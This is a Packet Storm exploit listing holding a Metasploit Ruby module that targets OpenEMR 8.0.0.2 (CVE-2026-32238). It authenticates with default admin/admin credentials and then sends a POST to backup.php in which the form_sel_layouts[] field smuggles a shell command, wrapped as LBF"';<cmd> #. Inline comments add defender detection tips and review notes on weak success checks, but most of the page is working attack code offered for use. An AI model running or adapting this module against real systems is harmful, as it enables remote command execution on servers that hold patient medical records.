## https://sploitus.com/exploit?id=PACKETSTORM:219177
==================================================================================================================================
    | # Title     : OpenEMR 8.0.0.2 Remote Code Execution Module                                                                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads                                                        |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit exploit module targets a potential Remote Code Execution (RCE) vulnerability in OpenEMR identified as CVE-2026-32238.
                     The module first authenticates with supplied credentials, then sends an HTTP POST to interface/main/backup.php in which the form_sel_layouts[] field carries the injected command; as written, it therefore depends on a valid OpenEMR login.
    
    [+] POC        :  
    
    # Metasploit remote exploit module, published as a proof of concept for the
    # OpenEMR issue named in the module title (CVE-2026-32238).
    #
    # Flow visible in this listing: log in through interface/main/main_screen.php,
    # then POST to interface/main/backup.php with form_step=102 and the command
    # string carried in form_sel_layouts[].
    #
    # Defender notes:
    # - Both requests are ordinary form POSTs, so request-body logging or WAF
    #   inspection is the natural detection point: backup.php requests with
    #   form_step=102 whose form_sel_layouts[] value contains quote characters,
    #   ';' or '#' do not look like a normal layout selection.
    # - As written the module needs a working login, so account hygiene (no weak or
    #   shared admin passwords, MFA where available) narrows exposure.
    # - This listing names no fixed version; confirm the patched release against
    #   the vendor advisory for the CVE.
    class MetasploitModule < Msf::Exploit::Remote
      # Self-assigned rank; the listing contains no `check` method or target list.
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      # NOTE(review): CmdStager and FileDropper are mixed in, but no method in
      # this listing calls into either of them.
      include Msf::Exploit::CmdStager
      include Msf::Exploit::FileDropper
    
      # Registers module metadata and user-settable options.
      #
      # The metadata hash carries only name, description, author and license; the
      # CVE identifier appears in the 'Name' string only (no 'References' entry).
      #
      # @param info [Hash] metadata overrides merged in by update_info
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'OpenEMR CVE-2026-32238 RCE ',
          'Description' => 'Remote Code Execution Module',
          'Author' => ['indoushka'],
          'License' => MSF_LICENSE
        ))
    
        # Defaults: HTTPS on port 443, application under /openemr/, and the
        # credential pair admin/admin.
        # NOTE(review): whether admin/admin matches any real deployment is not
        # shown here; the point for defenders is that valid credentials are an
        # input to this module, not something it obtains.
        register_options([
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'SSL', true]),
          OptString.new('TARGETURI', [true, 'Path', '/openemr/']),
          OptString.new('USERNAME', [true, 'User', 'admin']),
          OptString.new('PASSWORD', [true, 'Pass', 'admin']),
          OptInt.new('TIMEOUT', [true, 'Timeout', 10])
        ])
    
        # Session cookie string, filled in by #authenticate.
        @cookie = nil
      end
    
      # Joins the configured TARGETURI with an application-relative path.
      #
      # @param path [String] path below the OpenEMR base URI
      # @return [String] result of normalize_uri
      def uri(path)
        normalize_uri(datastore['TARGETURI'], path)
      end
    
      # Posts USERNAME/PASSWORD as authUser/clearPass to the login endpoint and
      # stores the OpenEMR cookie from the response in @cookie.
      #
      # NOTE(review): success is decided only by the presence of an OpenEMR cookie
      # in the response; status code and body are not inspected. If the server
      # also issues that cookie on a rejected login (not shown here - confirm),
      # a `true` result does not prove the credentials were accepted, and the
      # backup.php request may follow a failed login in the logs.
      #
      # @return [Boolean] true when an OpenEMR cookie was captured, false when
      #   there was no response or no such cookie
      def authenticate
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri('interface/main/main_screen.php'),
          'vars_post' => {
            'authUser' => datastore['USERNAME'],
            'clearPass' => datastore['PASSWORD']
          },
          'timeout' => datastore['TIMEOUT']
        })
    
        return false unless res
    
        if res.get_cookies =~ /OpenEMR=([^;]+)/
          @cookie = "OpenEMR=#{$1}"
          return true
        end
    
        false
      end
    
      # Sends one POST to interface/main/backup.php with the stored session
      # cookie, form_step=102 and the given string as form_sel_layouts[].
      #
      # NOTE(review): the return value reflects only that the server answered
      # HTTP 200; it says nothing about whether the supplied string was executed.
      #
      # @param cmd [String] value placed verbatim in form_sel_layouts[]
      # @return [Boolean, nil] truthy when a response with code 200 came back
      def inject(cmd)
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri('interface/main/backup.php'),
          'cookie' => @cookie,
          'vars_post' => {
            'form_step' => '102',
            'form_sel_layouts[]' => cmd
          },
          'timeout' => datastore['TIMEOUT']
        })
    
        res && res.code == 200
      end
    
      # Wraps a command in the fixed prefix `LBF"';` and the suffix ` #`, sends it
      # through #inject, and aborts the module when #inject reports failure.
      #
      # NOTE(review): the wrapper presumably closes a quoted value and comments
      # out the remainder of a server-side command line; the server-side code is
      # not part of this listing, so confirm against the vendor advisory.
      #
      # @param cmd [String] command text to embed
      # @param _opts [Hash] unused
      def execute_command(cmd, _opts = {})
        # Local variable; within this method it shadows the framework's `payload`.
        payload = "LBF\"';#{cmd} #"
    
        print_status("Injecting: #{cmd}")
    
        unless inject(payload)
          fail_with(Failure::NotVulnerable, 'Injection failed')
        end
      end
    
      # Entry point: authenticates, prints the target host, then passes the
      # encoded framework payload to #execute_command. Aborts with
      # Failure::NoAccess when #authenticate returns false.
      def exploit
        unless authenticate
          fail_with(Failure::NoAccess, 'Auth failed')
        end
    
        print_status("Target: #{rhost}")
    
        execute_command(payload.encoded)
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================